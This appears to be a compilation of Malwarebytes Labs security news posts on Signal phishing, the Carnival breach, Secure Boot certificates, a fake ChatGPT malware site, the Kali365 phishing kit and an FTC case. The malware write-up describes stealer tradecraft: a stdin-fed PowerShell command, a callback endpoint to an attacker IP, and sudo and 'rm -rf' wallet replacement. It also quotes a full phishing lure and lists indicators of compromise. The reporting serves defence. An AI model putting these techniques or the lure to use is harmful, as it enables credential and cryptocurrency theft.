Malware Bytes Security

Does it sometimes take your phone a few minutes to accomplish one simple task? That can be wildly frustrating.

But you’re in luck, because we’ve got a free tool that scans your phone for leftover files, temporary data, outdated caches and helps you clean up all that junk.

Introducing our Android Junk Cleaner. The new, free feature in our app clears out your unused files, helps protect your privacy, frees up valuable storage space, and improves your device’s performance. 

Start cleaning up your phone now. Download the app and clear out your junk.

How to clean up your Android device

1. Open the Malwarebytes app on your Android device

2. On the Junk Cleaner card, tap Clean

If this is your first time using Junk Cleaner, you’ll need to grant permissions:

• Allow file access: Tap Give permission, then turn on Allow Malwarebytes to manage all files.
• Allow usage access: Tap Go to Settings. Under App usage data, tap Malwarebytes, then turn on Permit access to app usage data. If the toggle is grayed out, follow the on-screen instructions to enable access.

3. Return to the Junk Cleaner screen and tap Refresh

4. Tap Select all, then Clean all

Once the cleanup is complete, you’ll see an “All clean” screen showing how much storage space you freed up.

Prefer to remove files individually? Just select the files or folders you want to delete, then tap Clean.

Important: Once files are deleted with Junk Cleaner, they cannot be recovered using the Malwarebytes app.

Get started

Download Malwarebytes for Android and start cleaning up your device today.

Not a Malwarebytes user yet? No problem, it’s never too late to start. Whether you’re looking for yourself, your family, or a small business, we have a range of plans to choose from.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Last week on Malwarebytes Labs:

• Payment apps are watching what you say (Lock and Code S07E11)
• Scammers pretending to be Microsoft had help from US executives
• 700+ education and tech websites hijacked in huge ClickFix malware campaign
• Fake software on GitHub and SourceForge distribute Deno RAT
• Fake LinkedIn emails abuse Adobe to track victims
• Company bragged phone mics could listen to conversations. They couldn’t.
• Kali365 phishing kit bypasses MFA and steals Microsoft logins
• Fake ChatGPT download site infects Windows and Mac users with malware
• Your Windows PC has a security deadline in June 2026
• Carnival confirms data breach impacting nearly 6 million
• Signal users targeted in backup-stealing phishing attacks

Stay safe!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This week on the Lock and Code podcast…

In the United States today, you can have your bank account closed, your credit cards cancelled, and your online payments revoked for any number of crimes, like funding terrorism, engaging in money laundering, or violating sanctions.

Sensible, right? Well, you can also face financial ruin for teaching poetry.

That’s what seemingly happened to a Persian poetry teacher from Detroit whose accounts were flagged for “sanctions violations” because his students wrote “Persian classes” in their Venmo memos. There’s also the story about the naked yoga practitioners who lost their payment processor for 60 days, forced to rebuild a subscriber list from scratch. And we can’t forget the San Diego cannabis journalist cut off from Stripe—and from a paid Substack newsletter—because of the payment platform’s rules that prohibit the promotion of the sale of cannabis.

This is “financial censorship,” and it often happens when a bank, credit card provider, or payment app decides that a customer is too risky to serve. But “risky” doesn’t always mean “illegal,” and when a major financial institution errs towards caution about what a customer is saying, advocating for, representing, or publishing, a lot of innocent people can be hurt in the process.

That’s what the digital rights activist Rainey Reitman learned in writing “Transaction Denied: Big Finance’s Power to Punish Speech.” As Reitman explained about these hugely impactful decisions:

“Even if they are well-intentioned, the financial systems can end up pulling in a lot of people that are not the actual target… Sometimes we talk about this as dolphins in the fishing lines.”

These decisions are difficult to fight, frustratingly opaque, and nearly impossible to reverse. Compounding the problem is that that there aren’t enough alternatives available for the financially censored to easily regain their freedom.

The reality for hundreds of millions of people in this country is that about a dozen companies control all their finances. People mostly bank with Chase, or Bank of America, or Citigroup, or Wells Fargo. They mostly use credit cards assigned by Visa, MasterCard, American Express, or Capital One. And they mostly send money to one another and to small businesses using services like PayPal, Venmo, Cash app, and Square.

For most people, these companies are supposed to operate in the background of their lives, providing reliable, secure financing to sustain and manage their livelihoods. But in practice, these companies can become quite interested in what you say online, what payments you receive each month, and the locations those payments arrived from.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Reitman—who is also the president and a co-founder of the Freedom of the Press Foundation—about the real stories of those who have been financially censored, why financial companies cut off customers for legal speech, and how a single company’s decision can create cascading consequences that feel impossible to fight.

“They’d be locked out of Venmo, then they’d be locked out of PayPal—which is connected to Venmo—and then they’d suddenly lose their Chase Bank account. You could see that in a lot of instances, losing one form of access to the financial system, it could result in a pattern where they would be losing access repeatedly.”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium Security for Lock and Code listeners.

A new phishing campaign is targeting Signal users by attempting to steal their backup recovery keys to access encrypted message archives. 

The attack is initiated by a text message pretending to come from Signal Support.

“Action Required: Data Recovery Needed
Your Signal account data (message and media) Is at risk of permanent loss due to a sync issue.
To avoid losing your messages and media:
1. Go to Settings -> Backups -> Configure -> Enable backups -> View Recovery Key.
2. Copy the recovery key to your clipboard.
3. Paste the key into this chat.
This links your existing backup to your account. Failure to do this may result in losing access to your account and all stored data.”

There are a few red flags in this message:

• The “Name not verified” label under the sender
• Repeated threats of losing all your data
• Pasting the key into the chat. Signal Support would never ask for your recovery key

Scam or legit? Scam Guard knows.

TRY IT NOW

The attack exploits Signal’s Secure Backups feature, which allows users to store encrypted archives of their conversations on Signal’s servers. These backups are protected by a 64-character recovery key.

That key should never leave the user’s device and is never shared with Signal’s servers. If hackers obtain this key and gain control of a victim’s account, they can download and decrypt the entire message history.

For an attacker, that’s even better than hijacking an account, which would only give them access to future messages.

For now, the attacks appear to be targeted. We have seen reports from journalists, reports of attacks on Chinese activists, and warnings from a researcher who investigates cyberattacks against journalists, dissidents, and human rights activists. But now that other cybercriminals are aware of this opportunity, the tactic could spread rapidly.

How to stay safe

Signal explicitly states that it will never reach out to users first and will never request registration codes, PINs, or recovery keys. 

• Treat unsolicited messages from “Support” as suspicious by default. Legitimate support for apps like Signal and WhatsApp do not ask you, in a chat message, to send back verification codes, PINs, or passwords.​ If you receive a warning about account problems, do not follow links in the message. Open the app’s settings directly or visit the official website through other means.
• Never share any secret codes, multi-factor authentication keys, or app PINs. SMS codes are there to prove that you control a phone number. Anyone who has the code can pretend to be you. App‑specific PINs or passcodes are there to protect account changes. Consider anyone asking for them to be a scammer.
• Use the extra security features these apps offer. Enable options like registration lock, registration PIN and device‑change alerts so that your account cannot be silently re‑registered without an extra secret. Store your PIN in a password manager instead of choosing something easy to guess or reusing a code. This reduces the risk of social engineering or shoulder‑surfing.
• Another useful feature is disappearing messages. Short‑timer and disappearing messages reduce how much content is available if an attacker gains access to a chat later, or obtains long‑term access to a device or backup. They are not a complete solution, but they can limit the damage.
• Use Malwarebytes Scam Guard on your device or online to check messages. Malwarebytes Scam Guard identified this message as a phishing attempt and provided further information about how to proceed.

Scammers know more about you than you think. 

Malwarebytes Mobile Security protects you from phishing, scam texts, malicious sites, and more. With real-time AI-powered Scam Guard built right in. 

Download for iOS → Download for Android → 

Carnival Corporation, parent of Carnival Cruise Line, is sending out fresh “Notice of Cybersecurity Event” letters dated May 27, 2026. If you feel like you’ve read that sentence before, you’re not imagining things. Over the last decade, the world’s largest cruise operator has accumulated a worrying track record of breaches, ransomware incidents, and regulatory penalties, with this 2026 incident adding yet another entry to an already lengthy cybersecurity history.

There are several data breaches involving Carnival Corporation or one of its subsidiaries in our database.

Between 2019 and 2021 alone, Carnival reported four separate cybersecurity events to the New York Department of Financial Services. These included two ransomware attacks and a phishing incident in which attackers deployed malware, accessed and encrypted internal systems, and stole personal customer and employee information.

In this latest case, an attacker used social engineering to trick a Carnival employee into granting access to part of the company’s IT systems on April 14, 2026. By April 22, they used a compromised account to access a “limited portion” of Carnival’s IT systems, where they were able to copy personal data before being blocked.

According to the data breach notice filed in Maine, a total of 5,995,277 people were affected. Carnival determined that the intruder had illegally copied files containing personal information and is now writing to affected individuals to tell them that “data elements” relating to them were obtained.

Researchers cited by Gblock say the stolen data appears to include:

• Full names
• Email addresses
• Dates of birth
• Genders
• Mariner Society membership status and tier
• Internal customer identifiers

The template letter does not list specific data fields. Instead, it uses a placeholder:

“We have determined that your <<data elements>> were obtained.”

This strongly suggests that Carnival is populating each letter with data categories relevant to that particular individual, a common pattern in large breaches where people may have provided different information at different times.

Furthermore, the letters contain the usual content about the speed with which the company acted, involving third‑party experts, and frame the affected systems as a limited subset of the environment. For recipients, the important fact is not how limited the breach was from the company’s point of view, but whether the exposed information could be used for identity theft, fraud, or highly convincing phishing attacks.

Breaches happen every day. Don’t be the last to know.

SEE PLANS

We do know from past Carnival incidents that exposed data has included names, addresses, dates of birth, passport numbers, health information, and payment details. In previous breaches affecting cruise lines, compromised data has ranged from basic contact details to Social Security numbers and credit card information. Carnival has not publicly disclosed the full categories of data involved in the 2026 incident, but given that this 2026 event again involves “personal information” copied from internal systems, it is reasonable to treat it as a serious privacy incident, even if the exact mix of data varies per person.

The attack was claimed by extortion group ShinyHunters, which is known to steal data and then ask for a ransom. If the victim does not agree to the terms, the data will be published and/or sold to the highest bidder.

ShinyHunters offers Carnival data for download

From a cybercriminal’s perspective, cruise industry data is highly prized. Cruise passengers are often relatively wealthy, and passenger records can combine identity data (names, addresses, dates of birth, passport numbers), contact data (emails, phone numbers), and potentially payment data (card numbers and sometimes bank details), making them valuable for identity theft, targeted phishing, and fraud.

What to do if you’re affected

To mitigate the fallout, Carnival is offering a complimentary 24‑month TransUnion credit‑monitoring package, delivered via the MyTrueIdentity platform and supported by Cyberscout for fraud assistance.

Be cautious of emails, texts, or calls claiming to come from Carnival or credit-monitoring providers, as cybercriminals often exploit breaches with phishing scams. Read our advice on what to do when you find out you’re involved in a data breach.

What do cybercriminals know about you?

Use Malwarebytes’ free Digital Footprint scan to see whether your personal information has been exposed online.

SCAN NOW

A Secure Boot certificate refresh is rolling out across supported Windows devices through Windows Update. In June 2026, the Secure Boot certificates that have shipped inside Windows since 2011 begin to expire, and Microsoft is replacing them with new 2023-dated certificates.

The good news: If you keep your PC updated, you probably won’t need to do anything. The bad news: Some older devices may not transition cleanly. Your PC won’t suddenly stop working, but over time it could miss important boot-level security protections without you realizing it.

Here’s what’s going on, why it matters, and how to check that your machine is on the right side of the deadline.

What is Secure Boot, and what’s expiring?

Secure Boot is a UEFI firmware feature built into virtually every PC sold since around 2012. It runs before Windows even starts loading, and its job is to verify that the boot loader and early boot components have been signed by a trusted party. If something tries to insert itself into the boot chain that isn’t on the trust list—a bootkit, for example—Secure Boot refuses to let it run.

The “trusted party” part is the crucial bit. Trust is established through cryptographic certificates baked into your motherboard firmware. The current certificates were issued in 2011 and are now reaching expiration. Three specific certificates are involved:

• Microsoft Corporation KEK CA 2011: expires June 24, 2026
• Microsoft UEFI CA 2011: expires June 27, 2026
• Microsoft Windows Production PCA 2011: expires October 19, 2026

Microsoft is replacing them with a 2023-dated set, including Windows UEFI CA 2023 and Microsoft Corporation KEK 2K CA 2023. According to Microsoft engineers speaking during a March 2026 AMA session, the new certificates are valid until 2038, and a separate post-quantum cryptography transition is planned for around 2030 for future hardware.

“Will my computer stop working?”

No. This is the single most important thing to understand, because the rumor mill has been louder than the facts.

If the deadline arrives and your PC is still running on the 2011 certificates, Windows will still boot, Windows Update will still work, and your PC will continue functioning normally.

What changes is that, in Microsoft’s own words, the device “will no longer be able to receive new security protections” for the early boot process, including updates to Windows Boot Manager, Secure Boot databases, revocation lists, and mitigations for newly discovered boot-level vulnerabilities.

In plain English: Your PC becomes harder to protect over time. It’s protected against today’s known boot threats, but not necessarily against the ones that will be discovered next month or next year.

That’s a problem because bootkits operate underneath Windows and antivirus software. They run before anything else and can disable the security tools that would normally catch them.

The BlackLotus problem

If you want a concrete example of why boot-level security matters, look at BlackLotus.

BlackLotus is a UEFI bootkit that emerged on hacking forums in 2022 and was confirmed in the wild by researchers in early 2023. It exploited CVE-2022-21894, nicknamed “Baton Drop,” to bypass Secure Boot on fully patched Windows systems. Once installed, it could disable BitLocker, Hypervisor-Protected Code Integrity (HVCI), and Microsoft Defender before Windows fully loaded.

Microsoft addressed the underlying flaw in CVE-2023-24932, but fixing vulnerable boot managers safely is complicated. Revoking the wrong boot components can leave systems unbootable, which is why Microsoft has rolled out protections gradually over several years.

The 2026 certificate rollover is a planned lifecycle event (the 2011 certificates were always going to expire), but it also enables the broader Secure Boot hardening Microsoft has been doing in response to vulnerable boot managers and attacks such as BlackLotus.

With the new trust anchors in place, Microsoft can continue rolling out newer 2023-signed boot components and safely revoke vulnerable ones as new threats emerge. Devices that don’t make the transition may eventually miss those future protections.

How the rollout works

Microsoft is using a staged rollout designed to avoid breaking systems.

A scheduled Windows task runs roughly every 12 hours and applies the update in stages:

1. Add the new Windows UEFI CA 2023 to the firmware’s signature database.
2. If the old 2011 third-party certificate is still present, add the Microsoft UEFI CA 2023 and Microsoft Option ROM UEFI CA 2023 alongside it.
3. Add the new Microsoft Corporation KEK 2K CA 2023 key.
4. Update the Windows Boot Manager to one signed by the new certificate. This step is deferred until the next natural reboot.

Microsoft’s IT pro guidance estimates the full process takes roughly 48 hours and one or more restarts to complete. Each step must succeed before the next one runs, so a device can sit partway through the sequence for a while if (for example) it’s waiting on a firmware update or a scheduled reboot.

For most home users, this happens silently in the background through normal cumulative updates.

Starting with the April 2026 Windows update, the Windows Security app includes updated Secure Boot status information under Device security that shows whether the new certificates have been applied successfully.

What could go wrong

Most systems will transition without problems, but there are some known trouble spots:

• Older PCs with outdated firmware. Some older UEFI firmware implementations don’t properly support the new certificates. These systems may require a BIOS or firmware update from the manufacturer before the transition can complete.
• PCs that bypassed Windows 11 requirements. If Secure Boot was disabled to install Windows 11 using unofficial workarounds, the new certificates cannot be applied correctly.
• Legacy BIOS / CSM systems. Devices running Legacy BIOS (or UEFI with Compatibility Support Module enabled) aren’t using Secure Boot at all, so they’re outside the scope of this update entirely.
• Custom firmware and weird configurations. Some custom or unusual firmware configurations may trigger a BitLocker recovery prompt after the Secure Boot variables change. Microsoft has been careful to note that BitLocker itself is not being disabled, but users should have their recovery keys handy just in case.

Windows Latest reported seeing update failures on thousands of PCs with outdated firmware during testing. Microsoft’s own guidance more broadly warns that firmware, platform, and OEM limitations can block the transition. In many cases, Windows Security will flag affected systems with yellow or red status warnings.

What home users should do

For most people, the advice is straightforward:

• Keep Windows fully up to date. Microsoft is rolling the new certificates out through normal Windows updates, and most home users won’t need to do anything beyond installing monthly updates.
• Check your Secure Boot status (the text, not just the color). Open Windows Security > Device security > Secure Boot. A green badge with the text “Secure Boot is on, preventing malicious software from loading when your device starts up.” is the all-clear. Microsoft warns that a green checkmark alone doesn’t confirm the new certificates have been applied.
• If your device is older, check for a BIOS/firmware update from your manufacturer. Some systems need them before the Secure Boot update can complete properly. This is especially important for PCs built before 2024.
• Don’t disable Secure Boot to “fix” something. Disabling Secure Boot is exactly the wrong response—it removes the protection entirely rather than updating it. Some game anti-cheat systems and older apps ask users to do this.
• Don’t panic about the new SecureBoot folder. Windows 11’s May 2026 cumulative update (KB5089549) creates a folder at C:\Windows\SecureBoot containing example PowerShell scripts intended for IT administrators. It’s not malware, it’s expected, and you don’t need to delete it.
• Use up-to-date, real-time anti-malware protection that can detect threats at the OS level even if something does slip past Secure Boot.

What IT teams should do

If you manage a fleet, Microsoft has published extensive guidance and the work is more involved. The short version:

• Inventory your devices now. Pull the manufacturer, model, BIOS version and date, baseboard product, and Secure Boot status across the fleet. Microsoft provides a PowerShell sample script at aka.ms/GetSecureBoot that surfaces the relevant registry keys and event IDs.
• Watch Event IDs 1801 and 1808. Event ID 1808 confirms the new certificates are in place. Event ID 1801 means the device has not completed the update.
• Test before broad rollout. Microsoft recommends testing at least four devices per unique manufacturer/model/firmware combination. Some systems may need an OEM firmware update before they can accept the new certificates.
• Choose one deployment method per device. Use registry keys, Group Policy, WinCS command-line tools, or Intune/ConfigMgr scripts, but don’t mix methods on the same machine.
• Pay attention to PXE imaging and Hyper-V. SCCM/MECM PXE servers may need a re-signed boot.wim, and Hyper-V hosts may need updating before new VMs are created with the 2023 KEK in the firmware template.
• Document devices that can’t be updated. Older hardware without OEM firmware support may need to be replaced before the deadline or formally accepted as an exception with compensating controls. These devices will keep working, but they may miss future boot-level protections.

The bottom line

This is one of those security events that won’t generate a dramatic incident on June 24, 2026. Nothing visible will break that day.

The risk is what happens in the months and years after. Devices that fail to transition to the new trust chain may slowly fall behind on future boot-level protections as Microsoft continues responding to threats like BlackLotus and other bootkits.

For most home users, Windows Update will handle the transition automatically. Your main job is to keep your system updated and verify Secure Boot status before the deadlines arrive.

If your hardware is older, now is a good time to check whether your manufacturer still provides firmware updates—and whether your PC is ready for the next decade of Secure Boot protections.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

A convincing fake website is impersonating OpenAI’s ChatGPT download page and infecting visitors with malware designed to steal passwords, browser data, cryptocurrency wallets, and other sensitive information.

The site, openew[.]app, closely mimics OpenAI’s real ChatGPT download experience and offers what appear to be official desktop apps for both Windows and macOS. Instead, Windows users receive a credential-stealing malware loader, while Mac users get Atomic Stealer (AMOS), a well-known macOS malware family associated with cryptocurrency theft.

The dual-platform setup is what makes the operation notable. Clicking the Windows download delivers a fake installer that opens a back channel to an attacker-controlled server. Clicking the macOS button delivers malware that steals browser passwords, cookies, Telegram sessions, cryptocurrency wallets, and other sensitive files. It also attempts to replace legitimate Ledger and Trezor wallet apps with trojanized versions.

If you only download ChatGPT from OpenAI’s official download page or the Microsoft Store, you were not the target here. But if you searched for “ChatGPT download” and clicked an ad or unfamiliar result, you may have given attackers access to your online accounts, browser sessions, saved passwords, and potentially your cryptocurrency holdings.

Technical analysis

The domain, openew[.]app, closely resembles OpenAI’s real ChatGPT download experience. It uses a dark theme, OpenAI-style branding, familiar marketing copy, and prominent download buttons for macOS and Windows.

The .app top-level domain is operated by Google and requires HTTPS connections, meaning browsers display the familiar padlock icon without obvious certificate warnings.

The most important detail is the dual-platform setup. Real software vendors provide separate installers for Windows and macOS, and this fake site does exactly the same thing.

Clicking the Windows button delivers Chat_GPT.exe, while clicking the macOS button downloads a disk image containing ChatGpt.dmg.

The Windows malware

Chat_GPT.exe is built almost entirely from off-the-shelf parts. The installer uses Inno Setup, a free open-source toolkit used by thousands of legitimate Windows products. Inside is an Electron application skeleton—the same Chromium-based framework used by apps like Slack and Discord—bundled with standard support libraries publicly available from the Electron project.

When the victim runs the installer, it creates files under %APPDATA%\LeronApplication, launches EApp.exe, and spawns PowerShell with the flags -ExecutionPolicy Unrestricted -Command -. The trailing dash tells PowerShell to read commands from standard input, meaning the malicious instructions never touch the disk where scanners might detect them. Behavioral telemetry recorded HTTP traffic to 188.137.246.189 using a /laravel.php?api=api&hash=...&message=... endpoint, alongside injection-like activity and service/autorun persistence signals. Nine of 69 antivirus engines flagged the file as malicious at the time of analysis. The persistence evidence is better read as behavioral tradecraft than proof of a durable install, but the overall pattern is familiar commodity stealer/dropper territory: cheap, modular, and effective rather than technically novel.

CAPTCHA displayed after the fake app launches, used to confirm that a real user is running it. The macOS malware: Atomic Stealer (AMOS)

The macOS payload sits at the premium end of the commodity-malware market. It’s Atomic Stealer, also known as AMOS, a malware-as-a-service platform documented since 2023, including in our 2024 coverage of an updated version.

The identification is fairly clear-cut. The sandboxed sample matches well-known AMOS behavior patterns: a long AppleScript chain passed to the macOS scripting engine, a silent password validation attempt using macOS directory-service commands, and—if that silent check fails—a fake macOS-style prompt reading “Please enter device password to continue,” complete with the familiar lock icon. Whatever the user types is validated against the same command. If it matches, the malware captures the user’s login password in cleartext.

From there, it follows a familiar AMOS playbook. It copies the macOS keychain, harvests cookies and saved logins from 12 Chromium-based browsers plus Firefox and Waterfox, and extracts Telegram session data. It also scans 16 cryptocurrency wallet directories, including Ledger Live, Trezor Suite, Exodus, Electrum, and Sparrow. Finally, it searches Desktop and Documents folders for files with extensions like .wallet, .seed, .key, and .kdbx. The collected data is compressed into a temporary archive and sent to a hardcoded server.

The wallet replacement feature is especially dangerous

There’s one more part of the macOS payload, and it’s likely the feature that justifies the price tag. After the initial data theft, the script downloads trojanized versions of Ledger Live, Ledger Wallet, and Trezor Suite from a second server. It then attempts to delete the legitimate wallet apps and replace them with the attacker’s versions.

If the user’s password was captured earlier in the attack chain, the script uses sudo to force the replacement. If not, it falls back to a standard rm -rf deletion attempt, which can still succeed if the apps are installed in a user-writable location. Either way, the next time the victim opens what appears to be their wallet software, they may actually be launching the attacker’s replacement.

This behavior has been documented in previous public AMOS analyses and makes the operator’s intent fairly clear. AMOS is heavily associated with cryptocurrency theft, and the macOS side of this campaign appears focused on exactly that outcome.

What the operation cost to build

This is where the AI angle becomes interesting, because the Windows and macOS sides of the operation sit at very different price points.

The domain openew.app probably cost the operators around $15 a year through a normal registrar. The .app domain requires HTTPS by default, making it easy for operators to present the reassuring browser padlock users associate with legitimate websites. The landing page itself is simply a copy of OpenAI’s real download page, something modern cloning tools can reproduce in minutes.

On the Windows side, most of the tools are cheap or free. Inno Setup is free. Electron is free. The Chromium support files are public downloads. The server infrastructure appears to rely on low-cost commodity malware tooling and a basic VPS that could cost only a few dollars a month. Altogether, the Windows side of this operation could plausibly have cost under $100 to set up initially.

The macOS side is very different. AMOS has reportedly rented for around $3,000 per month, paid in cryptocurrency. By comparison, Lumma—a popular Windows infostealer often treated as a similar product—has historically advertised entry tiers around $250 per month.

That price gap says a lot. The operators clearly believe a successful Mac infection is worth much more money than a typical Windows infection.

The likely reason is simple: AMOS is designed specifically for cryptocurrency theft, including the wallet-replacement behavior seen in this campaign. The operators are betting that a meaningful number of Mac users hold cryptocurrency.

Getting victims to the site is probably the only major ongoing cost, and that’s where the AI branding becomes valuable. Search ads, SEO poisoning, YouTube spam, and links shared in AI-focused Discord and Telegram communities can all drive traffic to fake download pages. Some of those channels cost money. Others are almost free.

Why attackers are going after AI brands

Most established software already has trusted download habits built around it. If you want Chrome, you probably know to go to Google. If you want Photoshop, you go to Adobe. People already know where the real download lives.

AI tools are different because most users are still installing them for the first time, and that means relying on search results, ads, YouTube links, or social posts to find the download page. That creates an ideal environment for fake sites.

Over the last two years, products like ChatGPT, Claude, Gemini, Sora, DeepSeek, Antigravity, and many others have launched or changed rapidly. Every new release creates another wave of users searching for “download ChatGPT” or “install Claude” without knowing the official URL. That search traffic is exactly where attackers set up shop.

The fake pages also do not need to be especially sophisticated because legitimate AI product pages are already minimal by design: a modern layout, a logo, and a large download button. Openew[.]app matches what users expect to see. There is no broken English or aggressive pop-ups here, just identical branding, copy, and the reassuring browser padlock.

What makes this kind of operation durable is how easily it can rotate brands. When the ChatGPT lure stops attracting clicks, the operators can reuse the same infrastructure around the next trending AI product. The malware behind the download button stays the same. Only the branding changes.

What AI vendors could do

Most major AI vendors, including OpenAI, already provide official download channels. The problem is visibility and user habit. Many users still search for “ChatGPT download,” where results can include official links, unofficial mirrors, and outright malicious sites.

Large consumer brands and banks often run aggressive brand-protection campaigns against fake ads and impersonation domains. AI vendors may need to do the same more consistently.

The other issue is discoverability. Official desktop-app links are often buried in settings menus or sidebars, while search engines are faster and more obvious. That’s exactly where the fake download sites are waiting.

What to do if you may have installed the fake app

If you recently installed something claiming to be ChatGPT from anywhere other than OpenAI’s official download page or the Microsoft Store, you may have been affected. From a different, clean device:

• Sign out of your important accounts using each service’s “sign out everywhere” option. This includes email, banking, cloud storage, GitHub, Discord, Telegram, and cryptocurrency exchanges.
• Change passwords starting with your primary email account.
• Rotate any API keys, SSH keys, and cloud credentials stored on the affected machine.
• If you hold cryptocurrency, move funds immediately using a separate clean device. On macOS specifically, do not open Ledger Live or Trezor Suite on the affected machine before reinstalling the operating system, as the wallet-replacement function may have succeeded.
• Monitor bank accounts and payment cards for suspicious activity.
• Reinstall the operating system. The Windows sample showed PowerShell command-and-control behavior, while the macOS payload may have captured the user’s login password. A clean reinstall is the safest recovery path.
• If this was a work device, contact your IT or security team immediately.

Closing thoughts

The reason this campaign is worth writing about is not the malware itself. Both payloads are already well documented. The Windows side is a commodity kit assembled from cheap, widely available parts. The macOS side is AMOS, a malware family that has been tracked since 2023.

What’s more interesting is the shape of the operation around that malware. A single fake site delivers two different payloads aimed at two different victim economics. Windows victims are positioned for broad monetization through credential and cookie theft. Mac victims are targeted more narrowly and lucratively through cryptocurrency theft, with operators apparently willing to spend thousands per month on tooling because the returns justify it.

The lure tying both sides together is the AI brand itself. Right now, AI product names generate huge amounts of first-time-download traffic from users who do not yet know the official URLs.

This is what a mature delivery business looks like. The interesting layer is not the binary, but the supply chain around it: the domain, certificate, clone page, traffic source, malware subscription, and exfiltration infrastructure. Each piece is cheap, modular, replaceable, and available off the shelf.

And the operators are not choosing between Windows and macOS. They are serving both from the same page, with payloads tuned to each platform’s economics. When one AI brand stops converting, they can simply swap the branding and reuse the same infrastructure around the next trending product.

AI hype will eventually fade. The kit probably will not.

Indicators of Compromise (IOCs)

File hashes (SHA-256)

• c9e0e6985dca3a179c9bdea4e7b38f7dc57fe00ecedc2fd634256fc53bf2de2d (Chat_GPT.exe)
• c0919e1999eaee67e67aeda0287722775afb04e9a9a0f727928b4d11265fb70b (ChatGpt.dmg)

Network indicators

• openew[.]app
• 188[.]137[.]246[.]189
• 192[.]253[.]248[.]181
• 172[.]94[.]9[.]250

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

When the Federal Bureau of Investigation (FBI) publishes a dedicated public service announcement about a new phishing kit, it’s worth paying attention to.

The agency is now warning about “Kali365,” a phishing‑as‑a‑service (PhaaS) platform that helps even low‑skilled attackers hijack Microsoft 365 accounts by stealing access tokens instead of passwords.

Although early reporting focuses on attacks against organizations, the underlying technique works just as easily against individual Microsoft 365 users who are tricked into entering a short code on a real Microsoft website. In other words, this is not just a business or IT department problem. It could affect anyone with an Outlook, OneDrive, or Microsoft 365 subscription.

For cybercriminals using the kit, it offers three clear advantages:

• It bypasses multi‑factor authentication (MFA) by stealing access tokens, so extra codes or apps no longer help once the token is compromised.
• Kali365 provides ongoing access. The attackers can keep using Outlook, Teams, and OneDrive without repeatedly logging in, as long as the stolen refresh token remains valid.
• Little technical skill needed. Cybercriminals can subscribe to Kali365 and immediately run token‑stealing campaigns at scale.

What does the attack look like?

Victims receive a phishing message that looks like it comes from a cloud service or collaboration tool, such as a document‑sharing notification or Teams invite. The message includes a short “device code” and instructions like: “Go to Microsoft’s verification page and enter this code to view the document.”

Scam or legit? Scam Guard knows.

TRY IT NOW

Unlike many phishing emails, this one sends you to a real Microsoft URL used for device sign‑in flows. To the user, the page looks familiar and completely legitimate, which lowers suspicion.

Victims then see the standard Microsoft sign‑in and consent screens and may think they are simply completing a normal security check. They never see a fake page, never type their password into a suspicious form, and may even see their organization’s branding.

But what they don’t realize is that they have handed access to the attacker.

Once the victim approves the request, the attacker’s device receives OAuth access and refresh tokens tied to the victim’s Microsoft 365 account. These tokens are what Microsoft uses to “remember” that you have already logged in, and they can be reused to access Outlook, OneDrive, Teams, and other Microsoft services without entering a password again.

With valid refresh tokens, attackers can maintain long‑term access until the tokens are revoked or expire, often blending in with normal account activity.

That access can allow cybercriminals to:

• Read Outlook emails, including password reset messages
• Access files stored in OneDrive or SharePoint
• Send phishing emails to coworkers, customers, friends, or family from the victim’s account

How to protect yourself

Once in Outlook, attackers can not only read your messages but also send convincing new ones from your address, using your identity to compromise additional accounts and contacts.

Some tips to steer clear of this one:

• Never enter a code at a Microsoft login page just because an email or message tells you to. You should only do this when you initiated the sign‑in yourself on your own device.
• Slow down and read the prompts. Rushing through login approvals without reading them carefully can be costly.
• Be suspicious of unexpected document shares, Teams invites, or login requests, even if they use legitimate Microsoft pages.
• Review which devices are logged in under your account at https://account.microsoft.com/devices/. If you see unfamiliar devices or sign‑ins, remove them, change your Microsoft account password, and review your security settings.

Pro tip: Malwarebytes Scam Guard can help you figure out if a message is a scam.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

A media company and two of its marketing partners have been fined for selling a service which, they said, listened in to people’s conversations through their phones. Actually they did nothing of the sort.

Most people have worried at some point that their phone has been listening to them through the microphone. You know how it goes: One minute you’re speaking to your friend about how you’ve always wanted to go to Fiji, the next minute you’re seeing social media ads for vacations there. However, as yet there hasn’t been much real proof that this is actually happening.

But that didn’t stop Cox Media Group from claiming it could listen in. Between 2023 and 2024, the company publicly promoted a service called “Active Listening” or “Voice Data,” claiming it used AI-powered voice-processing technology to capture conversations from smartphones, along with smart TVs and other devices with embedded microphones. 

The company told potential advertising clients that the system provided a tool to target, retarget, and retain customers.

The scandal came to light when 404 Media published internal pitch decks from Cox that detailed the supposed “Active Listening” capabilities. After the revelations, Cox initially backpedaled and denied listening to conversations, but the marketing materials contradicted these denials. 

The FTC found that the “Active Listening” service was completely fabricated. The service did not listen to consumers’ conversations or use voice data at all, nor did it accurately place ads in customers’ desired geographic locations. Instead, Cox and its partners simply resold email lists obtained from other data brokers at a significant markup.

Worst of all, the companies also falsely claimed that consumers had opted into voice data collection when they had not.

The Federal Trade Commission (FTC) fined the companies a total of $930,000 for falsely claiming they could spy on consumers. Cox Media Group must pay $880,000, while MindSift and 1010 Digital Works will each pay $25,000. The settlement funds will be used to provide refunds to Cox Media Group customers who were deceived by these false claims.

Are your details being used by cybercriminals? 

FIND OUT HERE

How to safekeep your personal data

In this case, the data that was being sold came from data brokers. Keeping your personal data away from them requires a combination of preventive measures and active removal efforts.

• Minimize what you share on social media and elsewhere online. Data brokers use scraping tools to gather information from forum posts and public profiles so avoid sharing sensitive details like your birth date, home address, phone number, and financial information. 
• Before signing up for online services, loyalty programs, or apps, carefully read privacy policies to understand how companies will collect, use, and share your data.
• For active data removal, your options depend largely on where you live. It’s often best to leave that work to a specialized service you can trust.
